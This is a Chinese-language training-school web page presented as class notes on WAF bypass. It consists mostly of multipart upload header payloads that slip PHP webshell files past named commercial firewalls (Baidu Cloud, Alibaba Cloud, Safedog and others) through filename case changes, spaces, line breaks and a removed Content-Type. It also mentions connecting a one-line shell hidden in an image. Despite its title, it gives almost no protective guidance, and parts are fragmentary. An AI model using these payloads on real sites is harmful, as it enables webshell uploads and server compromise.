八维教育IT培训学校

八维教育IT培训学校七大校区

首页 > 新闻资讯 > >

IT课堂笔记|常见的几种WAF绕过和防护原理

发布时间:2024-07-17 10:14:30 点击:

  访问shell.php就可以执行php代码 尝试修改压缩文件后缀为zip、phar、rar发现都是可以的。
常见的几种WAF绕过和防护原理

  WTS-WAF Bypass

  Content-Disposition: form-data; name=“up_picture”; filename=“xss.php”

  Baidu cloud Bypass

  发现百度云目前正在拦截后缀,百度云过上传还跟

  Content-Disposition: form-data; name=“up_picture”; filename=“xss.jpg .Php”

  百度云绕过就简单的很多很多,在对文件名大小写上面没有检测php是过了的,Php就能过,或者PHP,一句话自己合成图片用Xise连接即可。

  阿里云WAF

  Content-Disposition: form-data; name=“img_crop_file”; filename="1.jpg .Php"Content-Type: image/jpeg

  Bypass:

  Content-Disposition: form-data; name=“img_crop_file”; filename=“1.php”

  Note:你看的没错,删除Content-Type: image/jpeg即可绕过。

  安全狗上传Bypass(最新版不可绕)

  Content-Disposition: form-data; name=“image”; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png

  Bypass:

  Content-Disposition: form-data; name=“image”; filename=“085733uykwusqcs8vw8wky.png

  C.php”

  Note:删掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php".原理就不多说了,自己研究。

  云锁上传Bypass

  Content-Disposition: form-data; name=“up_picture”; filename=“xss.php”
北京八维教育培训学校网络工程专业培训